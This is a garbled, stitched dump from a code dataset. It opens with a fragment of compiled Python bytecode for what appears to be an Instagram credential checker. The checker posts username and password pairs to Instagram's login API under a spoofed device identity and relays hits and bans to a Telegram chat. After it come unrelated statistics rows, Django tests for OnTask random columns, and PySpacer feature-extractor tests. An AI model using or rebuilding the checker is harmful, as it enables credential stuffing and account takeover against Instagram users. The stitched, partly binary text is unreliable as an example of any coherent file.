\xf0\x9d\x90\x8d\xf0\x9d\x90\x84\xf0\x9d\x90\x96 \xf0\x9d\x90\x80\xf0\x9d\x90\x82\xf0\x9d\x90\x82\xf0\x9d\x90\x8e\xf0\x9d\x90\x94\xf0\x9d\x90\x8d\xf0\x9d\x90\x93 \xf0\x9d\x90\x88\xf0\x9d\x90\x8d\xf0\x9d\x90\x92\xf0\x9d\x90\x93\xf0\x9d\x90\x86\xf0\x9d\x90\x91\xf0\x9d\x90\x80\xf0\x9d\x90\x8c : \n____________________\n\xe2\x8c\xaf \xf0\x9d\x90\x8d\xf0\x9d\x90\x80\xf0\x9d\x90\x8c\xf0\x9d\x90\x84 : u\x1a\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\x94\xf0\x9d\x90\x92\xf0\x9d\x90\x84\xf0\x9d\x90\x91 : u*\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\x8f\xf0\x9d\x90\x80\xf0\x9d\x90\x92\xf0\x9d\x90\x92\xf0\x9d\x90\x96\xf0\x9d\x90\x8e\xf0\x9d\x90\x91\xf0\x9d\x90\x83 : u.\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\xb9\xf0\x9d\x90\x8e\xf0\x9d\x91\xb3\xf0\x9d\x91\xb3\xf0\x9d\x90\x8e\xf0\x9d\x90\x96\xf0\x9d\x90\x84\xf0\x9d\x90\x91\xf0\x9d\x90\x92 : u.\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\xb9\xf0\x9d\x90\x8e\xf0\x9d\x91\xb3\xf0\x9d\x91\xb3\xf0\x9d\x90\x8e\xf0\x9d\x90\x96\xf0\x9d\x90\x88\xf0\x9d\x90\x8d\xf0\x9d\x90\x86 : u\x1a\x00\x00\x00 .\n\xe2\x8c\xaf \xf0\x9d\x90\x83\xf0\x9d\x90\x80\xf0\x9d\x90\x93\xf0\x9d\x90\x80 : u<\x00\x00\x00 .\n_____________________\n\xe2\x8c\xaf \xf0\x9d\x90\x83\xf0\x9d\x90\x84\xf0\x9d\x90\x95 @VV00VG - @ZX7_M\n r\x05\x00\x00\x00r\x06\x00\x00\x00z\x06&text=)\x0c\xda\x07secretsr\x02\x00\x00\x00\xda\x08requests\xda\x03get\xda\x04json\xda\x03str\xda\x01B\xda\x05token\xda\x02ID\xda\x04post\xda\x05print\xda\x01G)\x12Z\x05userI\xda\x08passwordr\x0b\x00\x00\x00\xda\x04headZ\x06url_idZ\x06req_id\xda\x04namer\x13\x00\x00\x00Z\x08followesZ\tfollowingZ\x03ispZ\x03idd\xda\x02reZ\x03reeZ\x03datr\x15\x00\x00\x00Z\x03tlg\xda\x01i\xa9\x00r&\x00\x00\x00\xda\x00\xda\ncode_EXTRA)\x00\x00\x00s6\x00\x00\x00\x00\x01\x0e\x01\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf7\x06\n\x0c\x01\x12\x01\x14\x01\x14\x01\x18\x01\x18\x01\x14\x01\x14\x01\x10\x01\x08\x01\x08\x01.\x01\x16\x01\n\x01r(\x00\x00\x00z.https://i.instagram.com/api/v1/accounts/login/zqInstagram 113.0.0.39.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Y6 2019 pream; angler; angler; en_US)r\x0c\x00\x00\x00r\r\x00\x00\x00z\rgzip, deflatez\x05en-USz\x083brTvw==Z\x04WIFIz0application/x-www-form-urlencoded; charset=UTF-8z\x0fi.instagram.com)\tz\nUser-Agentr\x0f\x00\x00\x00r\x0e\x00\x00\x00z\x0fAccept-Encodingr\x10\x00\x00\x00z\x11X-IG-Capabilitiesz\x14X-IG-Connection-Typez\x0cContent-TypeZ\x04HostZ\n9087654321Z\x0210r\'\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00c\x00\x00\x00s\x18\x00\x00\x00|\x00]\x10}\x01t\x00\xa0\x01t\x02\xa1\x01V\x00\x01\x00q\x02d\x00S\x00)\x01N)\x03\xda\x06randomZ\x06choicer\x12\x00\x00\x00)\x02\xda\x02.0r%\x00\x00\x00r&\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00\xda\t<genexpr>R\x00\x00\x00\xf3\x00\x00\x00\x00r+\x00\x00\x00\xe9\x07\x00\x00\x00z\x06+98936Z\x040936Z\x05false\xda\x010)\x07\xda\x04uuidr!\x00\x00\x00\xda\x08usernameZ\tdevice_idZ\x08from_regZ\n_csrftokenZ\x14login_attempt_countn)\x02r\x11\x00\x00\x00r\x15\x00\x00\x00Z\x0elogged_in_user\xe9\x01\x00\x00\x00r0\x00\x00\x00z*"message":"challenge_required","challenge"z\x0busername : z\r: password : z\x19/editmessagetext?chat_id=z\x0c&message_id=u&\x00\x00\x00&text=\xe2\x8c\xaf BAN : \n\n\xe2\x8c\xaf \xf0\x9d\x90\x87\xf0\x9d\x90\x88\xf0\x9d\x90\x93 : [u\x16\x00\x00\x00]\n\xe2\x8c\xaf \xf0\x9d\x90\x81\xf0\x9d\x90\x80\xf0\x9d\x90\x83 : [u\x1e\x00\x00\x00] \n\n\xe2\x8c\xaf \xf0\x9d\x90\x83\xf0\x9d\x90\x84\xf0\x9d\x90\x95 : @VV00VG)8Z\nwebbrowserr)\x00\x00\x00r\x17\x00\x00\x00Z\nuser_agentr\x19\x00\x00\x00r\x16\x00\x00\x00r\x02\x00\x00\x00\xda\x03sysr/\x00\x00\x00r\x03\x00\x00\x00\xda\x04timer\x04\x00\x00\x00Z\x08pyfiglet\xda\x04open\xda\x01Er \x00\x00\x00\xda\x01S\xda\x01Z\xda\x01XZ\x02Z1\xda\x01F\xda\x01A\xda\x01Cr\x1b\x00\x00\x00\xda\x01YZ\x02Z2Z\x02aaZ\x02zzZ\rfiglet_formatZ\x03bnrr\x1f\x00\x00\x00\xda\x05inputZ\x03pasr\x1c\x00\x00\x00r\x1d\x00\x00\x00\xda\tlocaltime\xda\x01t\xda\x08strftimeZ\x0ccurrent_timer\x1e\x00\x00\x00Z\tstart_msgZ\x06id_msgr(\x00\x00\x00Z\x03urlr\x11\x00\x00\x00r\x12\x00\x00\x00r\x1a\x00\x00\x00\xda\x04join\xda\x05range\xda\x02usr0\x00\x00\x00r!\x00\x00\x00Z\x03uidr\x15\x00\x00\x00Z\x03reqZ\x05userQr&\x00\x00\x00r&\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\x90\x00\x00\x00(\x01\x0c\x01\x18\x01\x0c\x01\x0c\x01\x18\x01\x08\x01\n\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\n\x01\x0c\x01\x08\x01\x10\x01\x10\x01\x10\x01\x0c\x01\x08\x01\x08\x01\x0c\x01\x1c\x01\x0c\x02\x08\x1d\x04\x01\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf9\x06\x08\x04\x02\n\x01\x1c\x01\x08\x01\x08\x01\n\x01\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xfb\x06\x06\x10\x01\x0e\x01\x08\x01\x10\x01\x0c\x01\x0e\x01\x1a\x02*\x01\x18\x01'))
| 4,819
| 9,623
| 0.761776
| 2,096
| 9,638
| 3.468989
| 0.209924
| 0.133682
| 0.094072
| 0.080869
| 0.41246
| 0.371063
| 0.342869
| 0.278229
| 0.246596
| 0.246596
| 0
| 0.312166
| 0.009857
| 9,638
| 2
| 9,623
| 4,819
| 0.449754
| 0
| 0
| 0
| 0
| 2.5
| 0.869074
| 0.547775
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
|
0
| 12
|
298df0662301bcaf3d376143ad91a822f4a8ed82
| 13,848
|
py
|
Python
|
ontask/column/tests/test_logic.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 33
|
2017-12-02T04:09:24.000Z
|
2021-11-07T08:41:57.000Z
|
ontask/column/tests/test_logic.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 189
|
2017-11-16T04:06:29.000Z
|
2022-03-11T23:35:59.000Z
|
ontask/column/tests/test_logic.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 30
|
2017-11-30T03:35:44.000Z
|
2022-01-31T03:08:08.000Z
|
# -*- coding: utf-8 -*-
"""Test column basic operations"""
import json
import os
from django.conf import settings
from django.utils.dateparse import parse_datetime
from rest_framework import status
from ontask import models, tests
from ontask.dataops import pandas
from ontask.column import services
class ColumnAddRandomColumnForm(tests.OnTaskTestCase):
"""Test the creation of random columns."""
fixtures = ['simple_table']
filename = os.path.join(settings.ONTASK_FIXTURE_DIR, 'simple_table.sql')
user_email = 'instructor01@bogus.com'
user_pwd = 'boguspwd'
workflow_name = 'wflow1'
def test_create_random_column_number_form(self):
"""Create a random number column with no values"""
# Get the workflow first
self.workflow = models.Workflow.objects.all().first()
# Column name and current number of them
cname = 'random_column'
ncols = self.workflow.ncols
# JSON POST request for column creation with string value
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': 'bogus',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a single integer
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': '13.0',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a multiple strings
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': 'one, two, three',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a interval integer
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': '-3.0 - -5.0',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'double')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(
element in [-3, -4, -5] for element in data_frame[cname]))
# Delete the column
services.delete_column(self.workflow.user, self.workflow, new_column)
# JSON POST request for column creation with an integer list
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'double',
'raw_categories': '17, 18, 19',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'double')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(
element in [17, 18, 19] for element in data_frame[cname]))
def test_create_random_column_string_form(self):
"""Create a random string column"""
# Get the workflow first
self.workflow = models.Workflow.objects.all().first()
# Column name and current number of them
cname = 'random_column'
ncols = self.workflow.ncols
# JSON POST request for column creation with string value
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'string',
'raw_categories': 'bogus',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a string list
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'string',
'raw_categories': 'one, two, three',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'string')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(
element in ['one', 'two', 'three']
for element in data_frame[cname]))
def test_create_random_column_boolean_form(self):
"""Create a random string column"""
# Get the workflow first
self.workflow = models.Workflow.objects.all().first()
# Column name and current number of them
cname = 'random_column'
ncols = self.workflow.ncols
# JSON POST request for column creation with string value
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'boolean',
'raw_categories': 'bogus',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with string value
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'boolean',
'raw_categories': 'one, two',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'boolean')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(not element for element in data_frame[cname]))
# Delete the column
services.delete_column(self.workflow.user, self.workflow, new_column)
# JSON POST request for column creation with a string list
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'boolean',
'raw_categories': 'True, False',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'boolean')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(
element in [True, False] for element in data_frame[cname]))
def test_create_random_column_datetime_form(self):
"""Create a random number column with no values"""
# Get the workflow first
self.workflow = models.Workflow.objects.all().first()
# Column name and current number of them
cname = 'random_column'
ncols = self.workflow.ncols
# JSON POST request for column creation with incorrect string value
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'datetime',
'raw_categories': 'bogus',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a single integer
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'datetime',
'raw_categories': '2020-09-11 12:04:43+0930',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNone(new_column)
# JSON POST request for column creation with a multiple strings
dtimes = [
parse_datetime('2020-09-11 12:04:43+0930'),
parse_datetime('2020-09-12 12:04:43+0930')]
resp = self.get_response(
'column:random_column_add',
method='POST',
req_params={
'name': cname,
'data_type': 'datetime',
'raw_categories':
'2020-09-11 12:04:43+0930, 2020-09-12 12:04:43+0930',
'position': 0},
is_ajax=True)
resp_content = json.loads(resp.content)
self.assertTrue('html_form' not in resp_content)
self.assertTrue(status.is_success(resp.status_code))
self.workflow.refresh_from_db()
self.assertEqual(self.workflow.ncols, ncols + 1)
new_column = self.workflow.columns.filter(name=cname).first()
self.assertIsNotNone(new_column)
self.assertEqual(new_column.name, cname)
self.assertEqual(new_column.data_type, 'datetime')
data_frame = pandas.load_table(
self.workflow.get_data_frame_table_name())
self.assertTrue(all(
element in dtimes for element in data_frame[cname]))
# Delete the column
services.delete_column(self.workflow.user, self.workflow, new_column)
| 39.008451
| 77
| 0.60998
| 1,601
| 13,848
| 5.083073
| 0.08807
| 0.086999
| 0.047923
| 0.079872
| 0.9232
| 0.920128
| 0.920128
| 0.914721
| 0.914721
| 0.914721
| 0
| 0.013657
| 0.286179
| 13,848
| 354
| 78
| 39.118644
| 0.809611
| 0.094526
| 0
| 0.864769
| 0
| 0.003559
| 0.112624
| 0.026754
| 0
| 0
| 0
| 0
| 0.24911
| 1
| 0.014235
| false
| 0
| 0.02847
| 0
| 0.064057
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
29f4bab38728e3c2e4ab4f4e8bf8e90b8218b338
| 13,027
|
py
|
Python
|
spacer/tests/test_extract_features.py
|
beijbom/PySpacer
|
09ec5d41aa3d239e252e351b18a0835956c21903
|
[
"MIT"
] | 3
|
2020-03-09T00:30:20.000Z
|
2021-03-08T22:30:19.000Z
|
spacer/tests/test_extract_features.py
|
beijbom/PySpacer
|
09ec5d41aa3d239e252e351b18a0835956c21903
|
[
"MIT"
] | 28
|
2020-02-28T17:19:07.000Z
|
2022-03-25T04:59:26.000Z
|
spacer/tests/test_extract_features.py
|
beijbom/PySpacer
|
09ec5d41aa3d239e252e351b18a0835956c21903
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from PIL import Image
from spacer import config
from spacer.data_classes import ImageFeatures
from spacer.extract_features import feature_extractor_factory
from spacer.messages import \
ExtractFeaturesMsg, \
ExtractFeaturesReturnMsg, \
DataLocation
from spacer.storage import load_image
class TestDummyExtractor(unittest.TestCase):
def test_simple(self):
msg = ExtractFeaturesMsg(
job_token='job_nbr_1',
feature_extractor_name='dummy',
rowcols=[(100, 100)],
image_loc=DataLocation(storage_type='memory',
key='not_used'),
feature_loc=DataLocation(storage_type='memory',
key='not_used')
)
ext = feature_extractor_factory(msg.feature_extractor_name,
dummy_featuredim=4096)
features, return_msg = ext(Image.new('RGB', (100, 100)), msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 100)
self.assertEqual(features.point_features[0].col, 100)
def test_dims(self):
feature_dim = 42
ext = feature_extractor_factory('dummy',
dummy_featuredim=feature_dim)
self.assertEqual(ext.feature_dim, feature_dim)
def test_duplicate_rowcols(self):
msg = ExtractFeaturesMsg(
job_token='job_nbr_1',
feature_extractor_name='dummy',
rowcols=[(100, 100), (100, 100), (50, 50)],
image_loc=DataLocation(storage_type='memory',
key='not_used'),
feature_loc=DataLocation(storage_type='memory',
key='not_used')
)
ext = feature_extractor_factory(msg.feature_extractor_name,
dummy_featuredim=4096)
features, return_msg = ext(Image.new('RGB', (100, 100)), msg.rowcols)
self.assertEqual(len(features.point_features), len(msg.rowcols))
@unittest.skipUnless(config.HAS_CAFFE, 'Caffe not installed')
@unittest.skipUnless(config.HAS_S3_MODEL_ACCESS, 'No access to models')
@unittest.skipUnless(config.HAS_S3_TEST_ACCESS, 'No access to test bucket')
class TestCaffeExtractor(unittest.TestCase):
def setUp(self):
config.filter_warnings()
def test_simple(self):
msg = ExtractFeaturesMsg(
job_token='simple_job',
feature_extractor_name='vgg16_coralnet_ver1',
rowcols=[(100, 100)],
image_loc=DataLocation(storage_type='s3',
key='edinburgh3.jpg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 100)
self.assertEqual(features.point_features[0].col, 100)
def test_dims(self):
ext = feature_extractor_factory('vgg16_coralnet_ver1')
self.assertEqual(ext.feature_dim, 4096)
def test_corner_case1(self):
"""
This particular image caused trouble on the production server.
The image file itself is lightly corrupted, and PIL doesn't like it.
"""
msg = ExtractFeaturesMsg(
job_token='cornercase_1',
feature_extractor_name='vgg16_coralnet_ver1',
rowcols=[(148, 50), (60, 425)],
image_loc=DataLocation(storage_type='s3',
key='kh6dydiix0.jpeg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 148)
self.assertEqual(features.point_features[0].col, 50)
def test_cornercase2(self):
"""
This particular image caused trouble on the production server.
The image file itself is lightly corrupted, and PIL doesn't
quite like it.
"""
msg = ExtractFeaturesMsg(
job_token='cornercase_2',
feature_extractor_name='vgg16_coralnet_ver1',
rowcols=[(190, 226), (25, 359)],
image_loc=DataLocation(storage_type='s3',
key='sfq2mr5qbs.jpeg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 190)
self.assertEqual(features.point_features[0].col, 226)
def test_regression(self):
"""
This tests run the extractor on a known image and compares the
results to the features extracted with the
https://github.com/beijbom/ecs_spacer/releases/tag/1.0
"""
rowcols = [(20, 265),
(76, 295),
(59, 274),
(151, 62),
(265, 234)]
msg = ExtractFeaturesMsg(
job_token='regression_job',
feature_extractor_name='vgg16_coralnet_ver1',
rowcols=rowcols,
image_loc=DataLocation(storage_type='s3',
key='08bfc10v7t.png',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
legacy_feat_loc = DataLocation(storage_type='s3',
key='08bfc10v7t.png.featurevector',
bucket_name=config.TEST_BUCKET)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features_new, _ = ext(img, msg.rowcols)
features_legacy = ImageFeatures.load(legacy_feat_loc)
for pf_new, pf_legacy in zip(features_new.point_features,
features_legacy.point_features):
self.assertTrue(np.allclose(pf_legacy.data, pf_new.data,
atol=1e-5))
self.assertTrue(pf_legacy.row is None)
self.assertTrue(pf_new.row is not None)
@unittest.skipUnless(config.HAS_S3_MODEL_ACCESS, 'No access to models')
@unittest.skipUnless(config.HAS_S3_TEST_ACCESS, 'No access to test bucket')
class TestEfficientNetExtractor(unittest.TestCase):
def setUp(self):
config.filter_warnings()
def test_simple(self):
msg = ExtractFeaturesMsg(
job_token='simple_job',
feature_extractor_name='efficientnet_b0_ver1',
rowcols=[(100, 100)],
image_loc=DataLocation(storage_type='s3',
key='edinburgh3.jpg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 100)
self.assertEqual(features.point_features[0].col, 100)
self.assertEqual(len(features.point_features[0].data), 1280)
self.assertEqual(features.feature_dim, 1280)
def test_dims(self):
ext = feature_extractor_factory('efficientnet_b0_ver1')
self.assertEqual(ext.feature_dim, 1280)
def test_corner_case1(self):
msg = ExtractFeaturesMsg(
job_token='cornercase_1',
feature_extractor_name='efficientnet_b0_ver1',
rowcols=[(148, 50), (60, 425)],
image_loc=DataLocation(storage_type='s3',
key='kh6dydiix0.jpeg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 148)
self.assertEqual(features.point_features[0].col, 50)
self.assertEqual(len(features.point_features[0].data), 1280)
def test_corner_case2(self):
msg = ExtractFeaturesMsg(
job_token='cornercase_2',
feature_extractor_name='efficientnet_b0_ver1',
rowcols=[(190, 226), (25, 359)],
image_loc=DataLocation(storage_type='s3',
key='sfq2mr5qbs.jpeg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 190)
self.assertEqual(features.point_features[0].col, 226)
self.assertEqual(len(features.point_features[0].data), 1280)
def test_regression(self):
rowcols = [(20, 265),
(76, 295),
(59, 274),
(151, 62),
(265, 234)]
msg = ExtractFeaturesMsg(
job_token='regression_job',
feature_extractor_name='efficientnet_b0_ver1',
rowcols=rowcols,
image_loc=DataLocation(storage_type='s3',
key='08bfc10v7t.png',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
legacy_feat_loc = DataLocation(storage_type='s3',
key='08bfc10v7t.png.effnet.'
'ver1.featurevector',
bucket_name=config.TEST_BUCKET)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features_new, _ = ext(img, msg.rowcols)
features_legacy = ImageFeatures.load(legacy_feat_loc)
self.assertFalse(features_legacy.valid_rowcol)
self.assertEqual(features_legacy.npoints, len(rowcols))
self.assertEqual(features_legacy.feature_dim, 1280)
self.assertTrue(features_new.valid_rowcol)
self.assertEqual(features_new.npoints, len(rowcols))
self.assertEqual(features_new.feature_dim, 1280)
for pf_new, pf_legacy in zip(features_new.point_features,
features_legacy.point_features):
self.assertTrue(np.allclose(pf_legacy.data, pf_new.data,
atol=1e-5))
self.assertTrue(pf_legacy.row is None)
self.assertTrue(pf_new.row is not None)
if __name__ == '__main__':
unittest.main()
| 38.770833
| 77
| 0.595763
| 1,334
| 13,027
| 5.575712
| 0.130435
| 0.073138
| 0.065071
| 0.076902
| 0.877252
| 0.857085
| 0.831944
| 0.823071
| 0.805055
| 0.766335
| 0
| 0.036272
| 0.312198
| 13,027
| 335
| 78
| 38.886567
| 0.793862
| 0.048131
| 0
| 0.795082
| 0
| 0
| 0.064393
| 0.00407
| 0
| 0
| 0
| 0
| 0.196721
| 1
| 0.061475
| false
| 0
| 0.032787
| 0
| 0.106557
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4b03832cb70a8de964c330330e59fdcad1e38c7b
| 48
|
py
|
Python
|
alfalfa/action_imports.py
|
electronhead/alfalfa
|
6098a87c88b0ae6aff8c8f6d41b924d293500e62
|
[
"MIT"
] | null | null | null |
alfalfa/action_imports.py
|
electronhead/alfalfa
|
6098a87c88b0ae6aff8c8f6d41b924d293500e62
|
[
"MIT"
] | null | null | null |
